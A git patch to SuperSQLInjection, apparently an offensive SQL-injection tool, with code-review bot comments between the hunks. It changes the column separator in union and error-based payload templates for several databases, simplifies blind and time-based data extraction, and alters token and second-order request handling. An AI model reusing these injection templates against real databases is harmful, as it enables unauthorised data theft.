From c89bc8f235d362c9d853c95694bbf769532c1aa2 Mon Sep 17 00:00:00 2001 From: shack2 Date: Wed, 27 May 2020 11:37:39 +0800 Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E5=88=86=E9=9A=94=E7=AC=A6?= =?UTF-8?q?=E9=97=AE=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- SuperSQLInjection/Main.cs | 57 +++++++---------------- SuperSQLInjection/bypass/StringReplace.cs | 19 +++++++- SuperSQLInjection/payload/Comm.cs | 4 +- SuperSQLInjection/payload/DB2.cs | 2 +- SuperSQLInjection/payload/Informix.cs | 2 +- SuperSQLInjection/payload/Oracle.cs | 4 +- SuperSQLInjection/payload/PostgreSQL.cs | 6 +-- SuperSQLInjection/payload/SQLite.cs | 2 +- SuperSQLInjection/tools/Tools.cs | 2 +- SuperSQLInjection/tools/http/HTTP.cs | 23 ++++++--- 10 files changed, 61 insertions(+), 60 deletions(-) diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs index 2abf957..44d0c3c 100644 --- a/SuperSQLInjection/Main.cs +++ b/SuperSQLInjection/Main.cs @@ -286,7 +286,7 @@ namespace SuperSQLInjection responseStream.Close(); } - public static int version = 20200209; + public static int version = 20200527; public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version; //检查更新 public void checkUpdate() @@ -792,10 +792,8 @@ namespace SuperSQLInjection this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info); stp.Cancel(); this.currentThread.Abort(); - } status = 0; - } public void getVariablesByUnion(DBType dbType) 
@@ -2710,11 +2708,9 @@ namespace SuperSQLInjection { //2分法获取中间数字 mid = Tools.getLargeNum(start, end); - payload = ByPassForBetween(payLoadStr, mid); ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet); Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType, config.injectHTTPCode); - if (end == start) { if (exists) @@ -2723,9 +2719,7 @@ namespace SuperSQLInjection } else { - return end; - } } if (exists) 
@@ -5141,47 +5135,21 @@ namespace SuperSQLInjection String va_payload = MySQL.ver_value.Replace("{data}", data_payload); String colvalue = ""; - //获取值 for (int i = 1; i <= len; i++) { - String tmp_va_payload = MySQL.ord_value.Replace("{data}", data_payload).Replace("{index}", i + ""); - String plen = MySQL.ver_length.Replace("{data}", tmp_va_payload); - int mu_payload_len = 0; - //MySQL多字节ord,先判断ord后的长度,在取每一个的值 + String tmp_va_payload = va_payload.Replace("{index}", i + ""); + int ascii = 0; if (config.keyType.Equals(KeyType.Time)) { - mu_payload_len = getValue(MySQL.getBoolDataBySleep(MySQL.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8); + ascii = getValue(tmp_va_payload, 0, 127); } else { - mu_payload_len = getValue(plen, 2, 8); + ascii = getValue(tmp_va_payload, 0, 127); } - - //判断ord转换后的字符长度 - - int m_index = 1; - String[] ver_tmp = new String[mu_payload_len]; - while (m_index <= mu_payload_len) - { - - int ascii = 0; - if (config.keyType.Equals(KeyType.Time)) - { - ascii = getValue(MySQL.getBoolDataBySleep(MySQL.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9); - } - else - { - ascii = getValue(MySQL.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9); - } - ver_tmp[m_index - 1] = ascii + ""; - m_index++; - } - //设置值,这里由于是hex值,需要转换 - String hexstring = Tools.convertToString(ver_tmp); - String hexvalue = Convert.ToString(int.Parse(hexstring), 16); - colvalue += Tools.unHex(hexvalue, config.db_encoding); - + colvalue += ((char)ascii).ToString(); } + if (lvi == null) { lvi = new ListViewItem(colvalue); @@ -6043,6 +6011,7 @@ namespace SuperSQLInjection GetDataPam gp = (GetDataPam)opam; ListViewItem lvi = new ListViewItem(); String result = getOneDataByUnionOrError(SQLServer.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns)); + result = HttpUtility.HtmlDecode(result); //数结果改成xml格式,单独解析 addItemToListViewBySQLServerXMLData(result, gp.columns); 
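Review bot: Both branches of `if (config.keyType.Equals(KeyType.Time))` now execute the identical statement `ascii = getValue(tmp_va_payload, 0, 127);`, so the conditional is dead and should collapse to that single assignment. The deleted lines treated the two key types differently; if they were meant to converge, a one-line comment saying so would stop the next reader from assuming a merge accident. The new bounds `0, 127` and the `(char)ascii` cast also narrow `colvalue` to 7-bit characters, whereas the removed code decoded through `config.db_encoding`; that behaviour change is not mentioned in the commit message and deserves a comment at the cast. The enclosing method starts and ends outside the hunk.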
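Review bot: `result = HttpUtility.HtmlDecode(result);` runs before `addItemToListViewBySQLServerXMLData` parses `result` as XML, so any entity-escaped text inside the data (`&lt;`, `&amp;`) becomes literal markup characters before the parser sees them and can alter or break the parse. If the decode is there because the whole response body arrives HTML-escaped, say so in a comment on that line; otherwise decoding each value after parsing is the safer order. The enclosing method starts and ends outside the hunk.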
@@ -10804,7 +10773,15 @@ namespace SuperSQLInjection private void btn_inject_randStr_Click(object sender, EventArgs e) { - this.txt_inject_request.SelectedText = "" + this.txt_inject_request.SelectedText + ""; + if (this.txt_inject_request.SelectedText.Length > 0) + { + this.txt_inject_request.SelectedText = "" + this.txt_inject_request.SelectedText + ""; + + } + if (this.txt_sencond_request.SelectedText.Length > 0) + { + this.txt_sencond_request.SelectedText = "" + this.txt_sencond_request.SelectedText + ""; + } } private void txt_sencond_request_TextChanged(object sender, EventArgs e) diff --git a/SuperSQLInjection/bypass/StringReplace.cs b/SuperSQLInjection/bypass/StringReplace.cs index bf947a0..41be66e 100644 --- a/SuperSQLInjection/bypass/StringReplace.cs +++ b/SuperSQLInjection/bypass/StringReplace.cs @@ -11,10 +11,25 @@ namespace SuperSQLInjection.bypass { class StringReplace { - public static String strReplaceCenter(Config config, String request, Hashtable replaceList) + public static String lastRand = ""; + public static String lastpayload = ""; + public static String strReplaceCenter(Config config, String request, Hashtable replaceList,String payload) { //修改随机值 - request = Regex.Replace(request, "(\\[.\\s\\S]*?\\<\\/Rand\\>)", System.Guid.NewGuid().ToString("N")); + String rand = ""; + if (payload.Equals(lastpayload)) { + rand = lastRand; + } + else { + rand = System.Guid.NewGuid().ToString("N"); + } + + if (payload.Equals("请求二次注入页面")) { + rand = lastRand; + } + request = Regex.Replace(request, "(\\[.\\s\\S]*?\\<\\/Rand\\>)", rand); + lastRand = rand; + lastpayload = payload; //找到需要处理的字符 MatchCollection mc = Regex.Matches(request, "(?<=(\\))[.\\s\\S]*?(?=(\\<\\/Encode\\>))"); String str=""; diff --git a/SuperSQLInjection/payload/Comm.cs b/SuperSQLInjection/payload/Comm.cs index 4f6fb3d..63b8645 100644 --- a/SuperSQLInjection/payload/Comm.cs +++ b/SuperSQLInjection/payload/Comm.cs 
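Review bot: The two new `if` blocks are the same three statements applied to different text boxes, so a local helper removes the duplication: `void Wrap(TextBoxBase box) { if (box.SelectedText.Length > 0) { box.SelectedText = "" + box.SelectedText + ""; } }` called once for `txt_inject_request` and once for `txt_sencond_request` (adjust the parameter type to whatever the controls actually are). The wrapping literals appear as empty strings `""` on this page, presumably because tag-like text was stripped in rendering; whichever literal is intended, keeping it in one place avoids the two copies drifting. The stray blank line before the first block's closing brace is also inconsistent with the second block.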
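Review bot: `payload.Equals(lastpayload)` and `payload.Equals("请求二次注入页面")` dereference `payload` with no null check, so a null argument from any caller throws NullReferenceException; `string.Equals(payload, lastpayload, StringComparison.Ordinal)` is null-safe and makes the comparison explicit. `lastRand` and `lastpayload` are public mutable statics read and then overwritten on every call with no synchronization, and Main.cs drives requests from a thread pool (`stp`), so if this method is reached concurrently two requests can swap random values; either guard the pair with a private lock object or have the caller own that state. The literal `"请求二次注入页面"` is a magic string the caller must match exactly; a shared named constant avoids silent drift. When that branch runs before any other payload has been processed, `lastRand` is still `""` and the placeholder is replaced with an empty string, which is worth a comment or a guard. The enclosing method continues outside the hunk.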
@@ -8,8 +8,8 @@ namespace SuperSQLInjection.payload class Comm { - public const String COLUMNS_SPLIT_STR = "$_$"; - public const String COLUMNS_REG_SPLIT_STR = "\\$_\\$"; + public const String COLUMNS_SPLIT_STR = "$\t$"; + public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$"; public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8"); public static String exists_table = " exists(select 1 from {0})"; diff --git a/SuperSQLInjection/payload/DB2.cs b/SuperSQLInjection/payload/DB2.cs index b1f67e9..135bbd9 100644 --- a/SuperSQLInjection/payload/DB2.cs +++ b/SuperSQLInjection/payload/DB2.cs @@ -82,7 +82,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(String unionFileTemplate, List columns, String dbname, String table, String index) { - String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; + String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index))); return union_value.Replace("{data}", template); } diff --git a/SuperSQLInjection/payload/Informix.cs b/SuperSQLInjection/payload/Informix.cs index 264c1ef..559a09a 100644 --- a/SuperSQLInjection/payload/Informix.cs +++ b/SuperSQLInjection/payload/Informix.cs @@ -38,7 +38,7 @@ namespace SuperSQLInjection.payload public static String substr = "substr(({data})),{index},1)"; //多字节 - public static String hex_value = "ascii({data})"; + //public static String hex_value = "ascii({data})"; //bool方式字符长度判断 public static String bool_length = " length(({data}))>{len}"; diff --git a/SuperSQLInjection/payload/Oracle.cs b/SuperSQLInjection/payload/Oracle.cs index 50d56a5..a9f6386 100644 
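Review bot: The column separator is now spelled out by hand in two forms here (`COLUMNS_SPLIT_STR`, `COLUMNS_REG_SPLIT_STR`) and again as `chr(36)||chr(9)||chr(36)` or `char(36)||char(9)||char(36)` in DB2.cs, Oracle.cs (two sites), PostgreSQL.cs (two sites) and SQLite.cs, so this one change had to touch seven places and the next will too. Deriving the per-dialect expression from `COLUMNS_SPLIT_STR` with a small helper (map each character to its `chr(n)`/`char(n)` form and join with `||`) would leave a single source of truth, the same way `COLUMNS_SPLIT_HEX_STR` is already derived. The regex form is correct as written (`\$\t\$` matches dollar, tab, dollar), but `Regex.Escape(COLUMNS_SPLIT_STR)` on a `static readonly` field would make that invariant mechanical; failing that, add a comment stating that the three forms must be kept in sync.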
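Review bot: `hex_value` is commented out rather than deleted, and the same is done to `hex` in PostgreSQL.cs (@@ -81). Commented-out declarations are dead text that version control already preserves; delete the lines, or, if the field is kept so that existing callers still compile, mark it `[Obsolete("no longer used")]` so the intent is explicit. Which case applies cannot be determined from these hunks.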
--- a/SuperSQLInjection/payload/Oracle.cs +++ b/SuperSQLInjection/payload/Oracle.cs @@ -91,7 +91,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String dbname, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; + String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; for (int i = 1; i <= columnsLen; i++) { if (i == showIndex) @@ -163,7 +163,7 @@ namespace SuperSQLInjection.payload public static String getDataValue(List columns, String dbName, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"); + String data = Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||"); sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index)); sb.Append(","); sb.Remove(sb.Length - 1, 1); diff --git a/SuperSQLInjection/payload/PostgreSQL.cs b/SuperSQLInjection/payload/PostgreSQL.cs index a08e641..ec87195 100644 --- a/SuperSQLInjection/payload/PostgreSQL.cs +++ b/SuperSQLInjection/payload/PostgreSQL.cs @@ -81,7 +81,7 @@ namespace SuperSQLInjection.payload //error方式 public static String error_value = " 1=cast((chr(94)||chr(94)||chr(33)||({data})||chr(33)||chr(94)||chr(94)) as numeric)"; - public static String hex = "(select hex({data}))"; + //public static String hex = "(select hex({data}))"; public static String hex_value = "(select hex(convert(({data}) using UTF8)))"; public static String substr_value = "(select substr({data},{start},{len}))"; 
@@ -126,7 +126,7 @@ namespace SuperSQLInjection.payload /// 第几行数据,1开始 public static String getErrorDataValue(String dbname, String table, int index, List columns) { - String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||")); + String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(9)||chr(36)||")); String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString()); return error_value.Replace("{data}", d); } @@ -179,7 +179,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String dbname, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; + String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)"; for (int i = 1; i <= columnsLen; i++) { if (i == showIndex) diff --git a/SuperSQLInjection/payload/SQLite.cs b/SuperSQLInjection/payload/SQLite.cs index 13fc760..d3e933d 100644 --- a/SuperSQLInjection/payload/SQLite.cs +++ b/SuperSQLInjection/payload/SQLite.cs @@ -52,7 +52,7 @@ namespace SuperSQLInjection.payload public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List columns, String table, String index) { StringBuilder sb = new StringBuilder(); - String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)"; + String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)"; for (int i = 1; i <= columnsLen; i++) { if (i == showIndex) diff --git a/SuperSQLInjection/tools/Tools.cs b/SuperSQLInjection/tools/Tools.cs index c2ab5bb..fd07259 100644 
--- a/SuperSQLInjection/tools/Tools.cs +++ b/SuperSQLInjection/tools/Tools.cs @@ -498,7 +498,7 @@ namespace tools case KeyType.Time: - //由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值) + //由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值) int time = Tools.convertToInt(key); if (server.runTime > (time*1000-(time*deviation))) { diff --git a/SuperSQLInjection/tools/http/HTTP.cs b/SuperSQLInjection/tools/http/HTTP.cs index afbb5cc..49c5412 100644 --- a/SuperSQLInjection/tools/http/HTTP.cs +++ b/SuperSQLInjection/tools/http/HTTP.cs @@ -42,7 +42,7 @@ namespace SuperSQLInjection.tools public const int WaitTime = 5; public static Main main = null; public static long index = 0; - + public static String LastToken =""; public const String Socks5ProxyType = "Socks5"; public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED"; @@ -82,6 +82,7 @@ namespace SuperSQLInjection.tools { ServerInfo tserver = HTTP.sendRequestRetryNoToken(isSSL, tryCount, host, port, "获取Token", main.config.token_request, timeout, encoding, foward_302, redirectDoGet); token = Tools.substr(tserver.body, main.config.token_startStr, main.config.token_endStr); + } request = Regex.Replace(request, "(\\[.\\s\\S]*?\\<\\/Token\\>)", token); } @@ -338,7 +339,7 @@ namespace SuperSQLInjection.tools if (port > 0 && port <= 65556) { request = request.Replace(Main.setInjectStr, payload); - request = StringReplace.strReplaceCenter(main.config, request, main.replaceList); + request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload); //编码处理 server.request = request; 
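Review bot: `LastToken` is added as a public mutable static string, but no hunk in this patch reads or assigns it and the token code at @@ -82 keeps using its local `token`. If nothing outside the patch references it, the field is dead and should go; if it is meant to cache the token across requests, that use belongs in this commit with a comment, and the usual caveat about unsynchronised shared statics applies. Style: `=""` lacks the spacing used on the neighbouring declarations (`= 0`, `= null`).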
@@ -483,11 +484,15 @@ namespace SuperSQLInjection.tools return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet); } + } + //超时 + if (server.code >501&&server.code <505) + { + throw new Exception("http访问异常-code:"+ server.code+"!"); } - - //根据请求头解析 - if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1) + //根据请求头解析 + if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1) { int length = int.Parse(server.headers[Content_Length]); while (sum < length && sw.ElapsedMilliseconds <= timeout) @@ -764,7 +769,7 @@ namespace SuperSQLInjection.tools request = request.Replace(Main.setInjectStr, payload); //编码处理 - request = StringReplace.strReplaceCenter(main.config, request, main.replaceList); + request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload); TimeOutSocket tos = new TimeOutSocket(); if (main.config.proxy_mode == 1 || main.config.proxy_mode == 2) { @@ -920,7 +925,11 @@ namespace SuperSQLInjection.tools } - + //超时 + if (server.code > 501 && server.code < 505) + { + throw new Exception("http访问异常-code:" + server.code + "!"); + } //根据请求头解析 if (server.headers.ContainsKey(Content_Length) && server.header.IndexOf(Content_Length_Zero) == -1)
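Review bot: The new check `if (server.code >501&&server.code <505)` is labelled `//超时` (timeout), but the range it accepts, 502–504, also covers 502 Bad Gateway and 503 Service Unavailable, which are not timeouts, while 500 and 501 are excluded; either the comment or the bounds should state what is actually intended, e.g. `// 502-504: upstream/gateway failure, abort this request`. It throws the base `Exception` type, so callers can only distinguish it with a blanket `catch (Exception)`; an `IOException` or a small project exception carrying the status code as a property would let the retry path in sendRequestRetry catch it precisely. The same block is duplicated verbatim at @@ -920 (whose hunk runs past the end of this page) with different spacing; a shared helper such as `static void ThrowOnGatewayError(ServerInfo server)` removes the copy. The enclosing method continues outside the hunk.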